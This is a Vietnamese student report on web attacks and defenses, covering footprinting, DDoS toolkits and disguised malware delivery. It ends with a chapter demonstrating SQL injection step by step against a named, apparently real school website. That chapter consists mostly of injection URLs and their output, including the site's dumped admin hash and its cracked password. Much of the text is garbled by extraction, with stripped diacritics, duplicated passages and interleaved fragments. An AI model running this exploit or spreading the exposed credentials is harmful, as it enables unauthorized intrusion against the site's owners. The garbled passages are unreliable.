Cùng với sự phát triển của công nghệ thông tin, công nghệ mạng máy tính và sự phát triển của mạng internet ngày càng phát triển đa dạng và phong phú. Các dịch vụ trên mạng đã thâm nhập vào hầu hết các lĩnh vực trong đời sống xã hội. Các thông tin trên Internet cũng đa dạng về nội dung và hình thức, trong đó có rất nhiều thông tin cần được bảo mật cao hơn bởi tính kinh tế, tính chính xác và tính tin cậy của nó. Bên cạnh đó, các hình thức phá hoại mạng cũng trở nên tinh vi và phức tạp hơn. Do đó đối với mỗi hệ thống, nhiệm vụ bảo mật được đặt ra cho người quản trị mạng là hết sức quan trọng và cần thiết. Xuất phát từ những thực tế đó, chúng ta sẽ tìm hiểu về các cách tấn công phổ biến nhất hiện nay và các phòng chống các loại tấn công này. Chính vì vậy, thông qua việc nghiên cứu một số phương pháp tấn công và cách bảo mật các loại tấn công này, mình mong muốn góp một phần nhỏ vào việc nghiên cứu và tìm hiểu về các vấn đề an ninh mạng giúp cho việc học tập và nghiên cứu. 1. Lý do chọn đề tài Trong những năm gần đây, Việt Nam ngày càng phát triển và nhất là về mặt công nghệ thông tin. Đặc biệt là về ứng dụng web, hầu như mọi người ai cũng từng nghe và làm việc trên ứng dụng web. Website trở nên phổ biến và trở thành một phần quan trọng của mọi người và nhất là các doanh nghiệp, công ty. Bên cạnh đó lý do an toàn bảo mật cho ứng dụng web luôn là vấn đề nan giải của mọi người.Vì vậy chúng ta sẽ đi tìm hiểu ứng dụng web và cách thức tấn công và bảo mật web. 2. Mục tiêu Giúp chúng ta có thể hiểu hơn về các ứng dụng website, các mối đe dọa về vấn đề an toàn thông tin khi chúng ta làm việc trên ứng dụng web hàng ngày, hiểu rõ hơn về các kỹ thuật tấn công và bảo mật web. 3. Phạm vi Tìm hiểu các kỹ thuật tấn công phổ biến nhất hiện nay như SQL Injection, Denial Of Service, Local Attack,…Cách bảo mật, phòng thủ các loại tấn công phổ biến trên một cách tổng quan nhất.
LỜI MỞ ĐẦU Cùng với phát triển công nghệ thơng tin, cơng nghệ mạng máy tính phát triển mạng internet ngày phát triển đa dạng phong phú Các dịch vụ mạng thâm nhập vào hầu hết lĩnh vực đời sống xã hội Các thông tin Internet đa dạng nội dung hình thức, có nhiều thông tin cần bảo mật cao tính kinh tế, tính xác tính tin cậy Bên cạnh đó, hình thức phá hoại mạng trở nên tinh vi phức tạp Do hệ thống, nhiệm vụ bảo mật đặt cho người quản trị mạng quan trọng cần thiết Xuất phát từ thực tế đó, tìm hiểu cách công phổ biến phịng chống loại cơng Chính vậy, thơng qua việc nghiên cứu số phương pháp công cách bảo mật loại cơng này, mong muốn góp phần nhỏ vào việc nghiên cứu tìm hiểu vấn đề an ninh mạng giúp cho việc học tập nghiên cứu Lý chọn đề tài Trong năm gần đây, Việt Nam ngày phát triển mặt công nghệ thông tin Đặc biệt ứng dụng web, người nghe làm việc ứng dụng web Website trở nên phổ biến trở thành phần quan trọng người doanh nghiệp, cơng ty Bên cạnh lý an tồn bảo mật cho ứng dụng web vấn đề nan giải người.Vì tìm hiểu ứng dụng web cách thức công bảo mật web Mục tiêu Giúp hiểu ứng dụng website, mối đe dọa vấn đề an tồn thơng tin làm việc ứng dụng web hàng ngày, hiểu rõ kỹ thuật công bảo mật web Phạm vi Tìm hiểu kỹ thuật công phổ biến SQL Injection, Denial Of Service, Local Attack,…Cách bảo mật, phòng thủ loại công phổ biến cách tổng quan Mục lục CHƯƠNG TỔNG QUAN VỀ WEBSITE, CÁC DỊCH VỤ CỦA WEBSITE VÀ LỖI BẢO MẬT THÔNG DỤNG 1.1 Mô tả Website cách hoạt động 1.2 Các dịch vụ ứng dụng web CHƯƠNG CÁC LOẠI TẤN CÔNG VÀ BẢO MẬT ỨNG DỤNG WEB PHỔ BIẾN I Footprinting Phạm trù Footprinting Phương pháp thu thập thông tin Phương pháp cạnh tranh thông minh Phương pháp liệt kê DNS 10 “System Hacking” 10 Whois ARIN Lookups 11 Tìm kiểm vùng địa mạng (network address range) 14 Sự khác biệt loại bảng ghi DNS (DNS Record) 15 Sử dụng traceroute kỹ thuật FootPrinting 15 10 Theo dõi email (E-mail Tracking) 16 11 Thu thập thông tin qua Web (Web Spiders) 16 II Các dạng công 17 2.1 Tấn công SQL injection 17 2.2 Cross Site Scripting (XSS) 34 2.3 Local Attack 38 2.4 Tấn công từ chối dịch vụ - (Denial Of Service) 49 CHƯƠNG 70 DEMO TẤN CÔNG WEBSITE CƠ BẢN 70 CHƯƠNG TỔNG QUAN VỀ WEBSITE, CÁC DỊCH VỤ CỦA WEBSITE VÀ LỖI BẢO MẬT THƠNG DỤNG 1.1 Mơ tả Website cách hoạt động Website “trang web” mạng Internet, nơi giới thiệu thơng tin, hình ảnh doanh nghiệp sản phẩm, dịch vụ doanh nghiệp (hay giới thiệu thơng tin gì) để khách hàng truy cập nơi đâu, lúc Website tập hợp nhiều trang [web page] Khi doanh nghiệp xây dựng website nghĩa xây dựng nhiều trang thông tin, catalog sản phẩm, dịch vụ Để tạo nên website cần phải có yếu tố bản: Cần phải có tên miền (domain) Nơi lưu trữ website (hosting) Nội dung trang thông tin [web page] Một số thuật ngữ bản: Website động (Dynamic website) website có sở liệu, cung cấp công cụ quản lý website (Admin Tool) Đặc điểm website động tính linh hoạt cập nhật thông tin thường xuyên, quản lý thành phần website dễ dàng Loại website thường viết ngơn ngữ lập trình PHP, Asp.net, JSP, Perl, , quản trị Cơ sở liệu SQL MySQL Website tĩnh lập trình ngôn ngữ HTML theo trang brochure, sở liệu khơng có cơng cụ quản lý thông tin website Thông thường website tĩnh thiết kế phần mềm FrontPage, Dreamwaver, Đặc điểm website tĩnh thay đổi nội dung, thay đổi nội dung thường liên quan đến thay đổi văn kèm thể nội dung Hiện nay, hầu hết doanh nghiệp sử dụng website động, hệ công nghệ website người biết đến web 2.0 - Tên miền (domain): Tên miền địa website, internet tồn địa (tức tồn tên miền) Có loại tên miền: - Tên miền Quốc tế: tên miền có dạng com; net; org; biz; name - Tên miền Việt Nam: tên miền có dạng vn; com.vn; net.vn; org.vn; gov.vn; - Lưu trữ website: Dữ liệu thông tin website phải lưu trữ máy tính (máy chủ - server) hoạt động kết nối với mạng Internet Một server lưu trữ nhiều website, server bị cố chẳng hạn tắt thời điểm khơng truy cập website lưu trữ server thời điểm bị cố - Tùy theo nhu cầu lưu trữ thơng tin mà doanh nghiệp th dung lượng thích hợp cho website [thuê dung lượng host] - Dung lượng host: Là nơi để lưu sở trữ liệu website (hình ảnh, thơng tin …), đơn vị đo dung lượng thường Mb Gb - Băng thông hay dung lượng đường truyền truyền: Là tổng số Mb liệu tải lên máy chủ tải từ máy chủ (download, upload) nơi đặt website, đơn vị đo thông thường Mb/Tháng 1.2 Các dịch vụ ứng dụng web Với công nghệ nay, website không đơn giản trang tin cung cấp tin đơn giản Những ứng dụng viết web không gọi phần website nữa, chúng gọi phần mềm viết web Có nhiều phần mềm chạy web Google word (xử lý văn bản), Google spreadsheets (xử lý bảng tính), Email ,… Một số ưu điểm phần mềm hay ứng dụng chạy web: Mọi người có trình duyệt bạn cần trình duyệt để chạy phần mềm Phần mềm ln ln cập nhật chúng chạy server Luôn sẵn sàng 24/7 Dễ dàng backup liệu thường xuyên Có thể truy cập lúc, nơi, miễn bạn có mạng Chi phí triển khai cực rẻ so với phần mềm chạy desktop Hãy hình dung bạn có phần mềm quản lý bán hàng hay quản lý công việc công ty Không phải lúc bạn công ty, với phần mềm viết web, bạn vào kiểm tra, điều hành đâu, chí bạn cần điện thoại chạy trình duyệt IPhone mà khơng cần đến máy tính CHƯƠNG CÁC LOẠI TẤN CÔNG VÀ BẢO MẬT ỨNG DỤNG WEB PHỔ BIẾN I Footprinting Để bắt đầu công hệ thống, bạn cần thực bước: In dấu chân, Quét, Liệt kê Trước vào trò đùa thật sự, bạn hiểu sơ lược công việc Cụ thể tìm hiểu kỹ thuật in dấu chân (footprint) Ví dụ tên cướp muốn đánh cướp ngân hàng, chúng bước vào đòi tiền, mà chúng dốc sức thăm thơng tin từ ngân hàng Thơng tin mà thu thập tuyền đường mà xe bọc thép qua, phân phát, số thủ quỹ, thông tin khác giúp phi vụ thành công Yêu cầu áp dụng cho kẽ công mạng Chúng phải sức thu thập nhiều thơng tin tốt góc cạnh bảo mật tổ chức Kết thu giúp cơng trót lọt Bằng cách dị theo dấu chân, lưu trữ internet, truy cập từ xa, cùngvới diện internet kẽ công góp nhặt cách có hệ thống thông tin từ nhiều nguồn khác tổ chức đó.FootPrinting ? Footprinting phần giai đoạn cơng có chuẩn bị trước bao gồm việc tích lũy liệu mơi trường mục tiêu kiến trúc, thông thường với mục đích tìm cách để xâm nhập vào mơi trường đó.Footprinting tiết lộ lỗ hổng hệ thống xác định dễ dàng mà chúng khai thác Đây cách dễ cho hacker để thu thập thông tin hệ thống máy tính cơng ty mà họ thuộc Mục đích giai đoạn chuẩn bị để tìm hiểu nhiều tốt bạn hệ thống, khả truy cập từ xa nó, port dịch vụ mình, khía cạnh cụ thể bảo mật Phạm trù Footprinting Footprinting định nghĩa trình tạo kế hoạch chi tiết đồ hệ thống mạng tổ chức Thu thập thơng tin biết đến footprinting tổ chức Footprinting bắt đầu cách xác định mục tiêu hệ thống, ứng dụng, vị trí vật lý mục tiêu Một thơng tin biết đến, thông tin cụ thể tổ chức thu thập cách sử dụng phương pháp không xâm nhập Ví dụ, trang web riêng tổ chức cung cấp thư mục nhân viên danh sách bios nhân viên, mà hữu ích hacker cần sử dụng công kỹ thuật xã hội để đạt mục tiêu Một hacker dùng Google search Yahoo! People tìm kiếm để xác định vị trí thơng tin người nhân viên Google search engine sử dụng cách sáng tạo để thực việc tổng hợp thông tin Việc sử dụng Google searh engine để lấy thông tin gọi Google hacking http://groups.google.com sử dụng để tìm kiếm Google newsgroup Blog, new groups, báo chí…là nơi tốt để tìm kiếm thơng tin cơng ty hay nhân viên Các cơng ty tuyển dụng cung cấp thơng tin loại máy chủ thiết bị sở hạ tầng công ty sử dụng Các thơng tin khác thu bao gồm xác định công nghệ Internet sử dụng, hệ điều hành phần cứng sử dụng, hoạt động địa IP, địa e-mail số điện thoại, tập đồn sách thủ tục Note: Thông thường, hacker dùng 90% thời gian hồ sơ tập hợp thông tin mục tiêu 10% thời gian tiến hành việc công Phương pháp thu thập thông tin Tổng hợp thông tin thực bước mơ tả hình 2.1 Q trình footprinting thực bước việc khám phá thông tin ban đầu định vị phạm vi mạng Note: Những bước tổng hợp thông tin khác nằm chương 3, “Scanning and Enumeration” Một số nguồn thông thường sử dụng để thu thập thông tin bao gồm sau đây: ·Domain name lookup · Whois · Nslookup · Sam Spade Hình 2.1: B bước việc tổng hợp thông tin Bảy Trước thảo lu công cụ này, Hãy nhớ thông tin ngu o luận ng nguồn mở mang lại giàu có c thơng tin mục tiêu, ví dụ nh số điện thoại địa Thực nhữ yêu cầu Whois, tìm kiếm bảng Domain ững ng Name System (DNS) Hầu hết thơng tin d dàng có hợp pháp đ có t dễ p để Chi tiết cách hoạt độ DNS cụ thể dịch DNS ph vi ộng ch phạm sách không đượ thảo luận chi tiết Duy chi tiết quan nh liên ợc t quan cụ thể tới thông tin n sách Đó khuyến cáo r c nằm n tất ứng cử viên CEH có hi biết DNS cách phân tên công việc Internet hiểu c Hacking tool Sam Spade (http://www.samspade.org website có chứa b sưu tập http://www.samspade.org) t công cụ Whois, nslookup, traceroute B chúng xác đ Bởi c định vị trí website, cơng cụ làm việc cho vài hệ điều hành đơn v trí để cung u vị cấp thơng tin mục tiêu tổ chức Phương pháp cạnh tranh thơng minh nh Cạnh tranh thơng minh có ngh thu thập thông tin sản phẩm c người cạnh nh nghĩa m tranh, marketing, công ngh Hầu hết cạnh tranh thông minh không ng nghệ nh xâm nhập đến công ty đư điều tra bắt đầu tự nhiên, đư n được sử dụng để so sánh sản phẩm ho bán hàng chiến thuật marketing đ hiểu rõ m t để cách mà đối thủ cạnh tranh đ nh định vị sản phẩm dịch vụ họ Một ụ vài cơng cụ tồn cho mục đích t c tổng hợp cạnh tranh thông minh có th thể sử dụng hacker đ thu thập thông tin mục tiêu tiềm ẩn ng để n Phương pháp liệt kê DNS t NSlookup, DNSstuff, the American Registry for Internet Number (ARIN), Whois sử dụng tất c để đạt thơng tin mà kế sử dụng để thực t DNS enumeration Nslookup and DNSstuff Một công cụ mạnh mẽ b n nên làm quen nslookup (xem hình 2.2) Cơng c bạn cụ truy vấn DNS server để tìm thơng tin Nó cài đặt Unix, Linux, h ể t hệ hành Window Công cụ hack Sam Spade bao g gồm cơng cụ nslookup Hình 2.2 Nslookup Ngồi việc tìm thơng tin t c tổng hợp từ Whois, bạn sử dụng nslookup đ tìm ng để bổ sung địa IP cho máy ch host khác Sử dụng tên máy ch có thẩm ng chủ ng chủ quyền thơng tin từ Whois (AUTH1.NS.NYI.NET), b cần nhận địa IP mail bạn ỉ server Sự bùng nổ việc sử dụng thành thạo cơng cụ làm q trình hack th ã thật dễ dàng, bạn biết nhữ công cụ để sử dụng DNSstuff công c khác ững t cụ cơng cụ Thay s dụng dịng lệnh cơng cụ nslookup với nh sử i thiết bị chuyển mạch cồng kềnh đ tổng hợp việc ghi thông tin DNS, cầ truy cập a để ần website http://www.dnsstuff.com bạn làm DNS record search online, hình http://www.dnsstuff.com, t 2.3 cho thấy ví dụ DNS record search http://www.eccouncil.org s sử dụng DNSstuff.com Những tìm kiếm ti lộ tất bí danh kỷ lục m tiết http://www.eccuoncil.org đ IP web server Bạn chí có th khám phá địa m thể tất tên server liên quan đ IP địa Note: Việc khai thác có s tới bạn bạn có thơng tin th luận c sẵn c thảo chương “System Hacking” - Cách cài đặt passive: + Bug Website: attacker lợi dụng số lỗi web brower để cài Agent software vào máy user truy cập Attaker tạo website mang nội dung tiềm ẩn code lệnh để đặt bẫy user Khi user truy cập nội dung website, website download cài đặt Agent software cách bí mật Microsoft Internet Explorer web browser thường mục tiêu cách cài đặt này, với lỗi ActiveX cho phép IE brower tự động download cài đặt code máy user duyệt web + Corrupted file: phương pháp khác nhúng code vào file thông thường Khi user đọc hay thực thi file này, máy họ bị nhiễm Agent software Một kỹ thuật phổ biến đặt tên file dài, default hệ điều hành hiển thị phần đầu tên file nên attacker gửi kèm theo email cho nạn nhân file sau: iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe, thấy phần “Iloveyou.txt” hiển thị nên user mở file để đọc file thực thi Agent code cài vào máy nạn nhân Ngồi cịn nhiều cách khác ngụy trang file, ghép file… - Rootkit: chương trình dùng để xóa dấu vết diện Agent hay Handler máy nạn nhân Rootkit thường dùng Hander software cài, đóng vai trị xung yếu cho hoạt động attack-network hay môi trường mà khả bị phát Handler cao Rootkit dùng Agent mức độ quan trọng Agent khơng cao có số Agent không ảnh hưởng nhiều đến attack-network * Giao tiếp Attack-Network: - Protocol: giao tiếp attack-network thực protocol TCP, UDP, ICMP - Mã hóa giao tiếp: vài cơng cụ DDoS hỗ trợ mã hóa giao tiếp toàn attack-network Tùy theo protocol sử dụng để giao tiếp có phương pháp mã hóa thích hợp Nếu attack-network dạng IRC-based private secrect channel hỗ trợ mã hóa giao tiếp - Cách kích hoạt Agent: có hai phương pháp chủ yếu để kích hoạt Agent Cách thứ Agent thường xuyên quét thăm dó Handler hay IRC channel để nhận thị (active Agent) Cách thứ hai Agent đơn giản “nằm vùng” chờ thị từ Handler hay IRC Channel ii d Một số công cụ DDoS: Dựa tảng chung phần trên, có nhiều cơng cụ viết ra, thơng thường công cụ mã nguồn mở nên mức độ phức tạp ngày cao có nhiều biến thể lạ * Công cụ DDoS dạng Agent – Handler: - TrinOO: công cụ DDoS phát tán rộng rãi TrinOO có kiến trúc Agent – Handler, công cụ DDoS kiểu Bandwidth Depletion Attack, sử dụng kỹ thuật UDP flood Các version TrinOO không hỗ trợ giả mạo địa IP TrinOO Agent cài đặt lợi dụng lỗi remote buffer overrun Hoạt động hệ điều hành Solaris 2.5.1 Red Hat Linux 6.0 Attack – network giao tiếp dùng TCP (attacker client handler) UDP (Handler Agent) Mã hóa giao tiếp dùng phương pháp mã hóa đối xứng Client, handler Agent - Tribe Flood Network (TFN): Kiểu kiến trúc Agent – Handler, công cụ DDoS hoễ trợ kiểu Bandwidth Deleption Attack Resourse Deleption Attack Sử dụng kỹ thuật UDP flood, ICMP Flood, TCP SYN Smurf Attack Các version không hỗ trợ giả mạo địa IP, TFN Agent cài đặt lợi dụng lỗi buffer overflow Hoạt động hệ điều hành Solaris 2.x Red Hat Linux 6.0 Attack – Network giao tiếp dùng ICMP ECHO REPLY packet (TFN2K hỗ trợ thêm TCP/UDP với tính chọn protocol tùy ý), khơng mã hóa giao tiếp (TFN2K hỗ trợ mã hóa) - Stacheldraht: biến thể TFN có thêm khả updat Agent tự động Giao tiếp telnet mã hóa đối xứng Attacker Handler - Shaft: biến thể TrinOO, giao tiếp Handler – Agent UDP, Attacker – Hendle Internet Tấn công dùng kỹ thuật UDP, ICMP TCP flood Có thể cơng phối hợp nhiều kiểu lúc Có thống kê chi tiết cho phép attacker biết tình trạng tổn thất nạn nhân, mức độ quy mô công để điều chỉnh số lượng Agent * Công cụ DDoS dạng IRC – Based: Công cụ DDoS dạng IRC-based phát triển sau công cụ dạng Agent – Handler Tuy nhiên, công cụ DDoS dạng IRC phức tạp nhiều, tích hợp nhiều đặc tính công cụ DDoS dạng Agent – Handler - Trinity: điển hình cơng cụ dạng Trinity có hầu hết kỹ thuật cơng bao gồm: UDP, TCP SYS, TCP ACK, TCP fragment, TCP NULL, TCP RST, TCP random flag, TCP ESTABLISHED packet flood Nó có sẵn khả ngẫu nhiên hóa địa bên gởi Trinity hỗ trợ TCP flood packet với khả ngẫu nhân tập CONTROL FLAG Trinity nói số công cụ DDoS nguy hiểm - Ngồi nhắc thêm số công cụ DDoS khác Knight, thiết kế chạy Windows, sử dụng kỹ thuật cài đặt troijan back Orifice Knight dùng kỹ thuật công SYV, UDP Flood Urgent Pointer Flooder - Sau Kaiten, biến thể Knight, hỗ trợ nhiều kỹ thuật công như: UDP, TCP flood, SYN, PUSH + ACK attack Kaiten thừa hưởng khả ngẫu nhiên hóa địa giả mạo Trinity 2.4.3 Tấn công từ chối dịch vụ phản xạ nhiều vùng DRDoS (Distributed Reflection Denial of Service) Xuất vào đầu năm 2002, kiểu công nhất, mạnh họ DoS Nếu thực kẻ cơng có tay nghề hạ gục hệ thống phút chốc - Mục tiêu DDDoS chiếm đoạt tồn băng thơng máy chủ, tức làm tắc ngẽn hoàn toàn đường kết nối từ máy chủ vào xương sống Internet tiêu hao tài nguyên máy chủ Trong suốt trình máy chủ bị cơng DrDoS, khơng máy khách ch thể kết nối vào máy chủ Tất dịch vụ chạy TCP/IP DNS, HTTP, FTP, POP3, bị vô hiệu hóa - Về bản, DrDoS phối hợp hai kiểu DoS DDoS Nó có kiểu cơng SYN với máy tính đơn, vừa có kết hợp nhiều máy tính để chiếm dụng băng thông kiểu DDoS Kẻ công thực cách giả mạo địa server mục tiêu gửi yêu cầu SYN đến server lớn Yahoo,Micorosoft…,để server gửi gói tin SYN/ACK đến server mục tiêu Các server lớn, đường truyền mạnh vơ tình đóng vai trị zoombies cho kẻ cơng DdoS Hình 10 Sơ đồ mơ tả kiểu cơng DRDOS - Q trình gửi lặp lại liên tục với nhiều địa IP giảp từ kẻ công, với nhiều server lớn tham gia nên server mục tiêu nhanh chóng bị tải, bandwidth bị chiếm dụng server lớn Tính nghệ thuật chổ cần với máy tính với modem 56kbps, hacker lành nghề đánh bại máy chủ giây lát mà không cần chiếm đoạt máy để làm phương tiện thực cơng CHƯƠNG DEMO TẤN CƠNG WEBSITE CƠ BẢN Trước tiên, ta cần chuẩn bị website dính lỗi SQL Injection Ta thực demo site này: http://www.rubysaophuongnam.edu.vn/ Sau kiểm tra ta tìm link lỗi website này: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 Cách kiểm tra đơn giản, ta cần thêm dấu ‘ vào sau số 22 (ngồi cách cịn nhiều cách khác nữa), lỗi này: Ta tiến hành khai thác lỗi: Khai thác trường database: Sử dụng lệnh “order by” từ xuất site lỗi dừng Lệnh: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 order by http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 order by … http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 order by đến đây, site bình thường: Tiếp tục: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 order by 6-ta thấy site xuất lỗi (cụ th trả trang trắng): thể Ta kết luận số bảng có database Bước tiếp theo, ta tiến hành tìm bảng lỗi Ta sử dụng lệnh “UNION”: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 UNION SELECT 1,2,3,4,5 - Tìm bảng lỗi là: 3 Tiến hành khai thác version tên database site: Khai thác version: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 UNION SELECT 1,2,version(),4,5 - Khai thác database: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 UNION SELECT 1,2,database(),4,5 - Khai thác tên bảng: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5 from information_schema.tables where table_schema=database() album,gioi_thieu,khai_giang,lien_he,mail_dp,nguoi_dung,noi_dung,online,quang_cao,sa n_pham,tbl_config,tbl_stats,tbl_visitor,tbl_whoonline,tin_tuc,tu_khoa,tu_van Bây ta tìm bảng chứa thơng tin quản trị website (cái kinh nghiệm người) Ta thử khai thác cột bảng “nguoi_dung”: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5 from information_schema.columns where table_name=0x6e67756f695f64756e67 ma_nd,ma_loai_nd,ho_ten,mat_khau,chuc_vu Khai thác thông tin từ cột này: http://www.rubysaophuongnam.edu.vn/san_pham_tip.php?MSP=22 UNION SELECT 1,2,unhex(hex(group_concat(ma_nd,0x7c,ma_loai_nd,0x7c,ho_ten,0x7c,mat_khau,0x7 c,chuc_vu))),4,5 from nguoi_dung 1|1|thach|fcea920f7412b5da7be0cf42b8c93759|admin Cuối ta crack mật đăng nhập vào quản trị website: fcea920f7412b5da7be0cf42b8c93759 = md5(1234567) End! KẾT LUẬN A Đánh giá: * Các vấn đề đạt được: Theo yêu cầu đặt ban đầu thời điểm tại, báo cáo đạt nội dung sau: • Tìm hiểu kĩ thuật cơng ứng dụng Web bao gồm kĩ thuật: o Chèn mã lệnh thực thi trình khách Cross-site Scripting o Chèn câu truy vấn SQL Tấn công SQL Injection nâng cao o Tấn công Local Acttack o Từ chối dịch vụ • Các biện pháp bảo mật từ kết hợp nhà quản trị mạng, nhà thiết kế ứng dụng Web người dùng: o Kiểm tra trang Web có khả bị cơng kĩ thuật chèn câu lệnh SQL, thay đổi tham số hay khơng o Có thể phịng chống lỗi công thông dụng nay, vấn đề tìm hiểu * Hạn chế: Trong trình làm báo cáo có nhiều tài liệu chúng tơi tìm kiếm có mục đích giống song lại có phương pháp khác hồn tồn Chúng tơi cố gắng tìm hiểu thêm chúng khơng khỏi có nhiều sai sót B Hướng phát triển đề tài Trong phạm vi báo cáo nghiên cứu, đạt yêu cầu đặt Chúng em xin đề xuất hướng phát triển báo cáo mở rộng cố gắng phát triển thêm nội dung sau: • Tìm hiểu thêm kĩ thuật cơng để đưa phương pháp bảo mật ứng dụng Web mức độ sâu • Tìm hiểu vấn đề bảo mật sâu hơn, không dừng mức độ ứng dụng Web mà phát triển vần đề bảo mật hệ thống mạng dịch vụ • Khai triển chương trình phát lỗ hổng tốt hơn, nhiều phương diện kĩ thuật TÀI LIỆU THAM KHẢO A Tài liệu Tiếng Việt: [1] Tấn công từ chối dịch vụ Dos,Ddos,DRDos Tác giả Ng.Ng.Thanh Nghị-HVA [2] Bài giảng An Ninh Mạng.Tác giả GV.Nguyễn Anh Tuấn-Trung tâm TH-NN Trí Đức [3] Lỗi bảo mật ứng dụng web cách khắc phục.Tác giả Đặng Hải Sơn-Trung tâm ứng cứu khẩn cấp máy tính Việt Nam [4] Tấn cơng kiểu SQL Injection-Tác hại phịng tránh Tác giả Lê Đình Duy-Khoa CNTT-Trường ĐH Khoa Học Tự Nhiên TP.HCM [5] Web Application Attack & Defense Tác giả Võ Đỗ Thắng-Trung tâm An ninh mạng Athena [6] XSS Tác giả Mask-NBTA B Tài liệu Tiếng Anh: [7] SQL Injection-Are you web Applications vulnerable Author Kevin Spett [8] An Introduction to SQL Injection Attacks For Oracle Developers.Author Stephen Kost [9] How to Attack and fix Local File Disclosure Author Sangteamtham C Tài liệu internet: [10]http://thuvienkhoahoc.com/wiki/K%C4%A9_thu%E1%BA%ADt_t%E1%BA%A5 n_c%C3%B4ng_CROSS-SITE_SCRIPTING » [11]http://vi.wikipedia.org/w/index.php?title=Th%E1%BB%83_lo%E1%BA%A1i:T% E1%BA%A5n_c%C3%B4ng_t%E1%BB%AB_ch%E1%BB%91i_d%E1%BB%8Bch_ v%E1%BB%A5&action=edit&redlink=1 [12]http://www.hvaonline.net/hvaonline/posts/list/6720.hva;jsessionid=38F900726E076 41F712734A3B2A6F2EC [13]http://www.ddcntt.vn/forum/showthread.php?t=14 [14]http://ttgtc.com/forum/showthread.php?1385-T%C3%ACm-hi%E1%BB%83uv%E1%BB%81-t%E1%BA%A5n-c%C3%B4ng-t%E1%BB%AB-ch%E1%BB%91id%E1%BB%8Bch-v%E1%BB%A5-DoS&s=c580b874a6ea05d220258132c9cef9e3 ... trữ website (hosting) Nội dung trang thông tin [web page] Một số thuật ngữ bản: Website động (Dynamic website) website có sở liệu, cung cấp công cụ quản lý website (Admin Tool) Đặc điểm website... 70 DEMO TẤN CÔNG WEBSITE CƠ BẢN 70 CHƯƠNG TỔNG QUAN VỀ WEBSITE, CÁC DỊCH VỤ CỦA WEBSITE VÀ LỖI BẢO MẬT THÔNG DỤNG 1.1 Mô tả Website cách hoạt động Website “trang web? ?? mạng Internet,... org.vn; gov.vn; - Lưu trữ website: Dữ liệu thông tin website phải lưu trữ máy tính (máy chủ - server) hoạt động kết nối với mạng Internet Một server lưu trữ nhiều website, server bị cố chẳng hạn